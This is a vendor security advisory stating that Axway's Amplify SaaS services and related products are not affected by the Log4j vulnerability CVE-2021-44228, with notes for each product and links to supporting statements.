Axway Engineering has confirmed that Amplify SaaS services are NOT vulnerable

Context

A 0-day vulnerability in the popular Java logging library, log4j, was published on GitHub along with a POC that shows the possibility of Remote Code Execution (RCE) if log4j logs an attacker-controlled string value, CVE-2021-44228.

Axway is aware of Log4j CVE-2021-44228 and is evaluating its impact on all Axway products. As conclusions and recommendations are available we will be publishing them in the dedicated Alert on support.axway.com: https://support.axway.com/news/1331/lang/en

The current article intends to provide recommendations and technical clarifications with regards to the impact of CVE-2021-44228 in Amplify platform.

Details:

Amplify Central / Unified Catalog
Amplify Central and Unified Catalog do not use log4j and are not vulnerable.

Amplify repository

Amplify repository is not vulnerable based on feedback from JFrog: https://jfrog.com/knowledge-base/general-jfrog-ser...

Amplify Analytics

Fix is being deployed in production (Europe and US) December 16th

AxwayID

RedHat Single Sign-On 7 is affected by CVE-2021-4104. Statement from RedHat: https://access.redhat.com/security/cve/CVE-2021-4104 however AxwayID is not affected because:

1. JMS appender is not configured for use.
2. Changing the logging configuration is restricted to AGO.

Application Integration

Application Integration is not vulnerable as documented separately at https://support.axway.com/kb/181965

Products deployed on customer environment

Products below have no java code so are not using log4j and are not vulnerable:

Agents

Agents are written in golang.

CLI

CLI is written in node.js.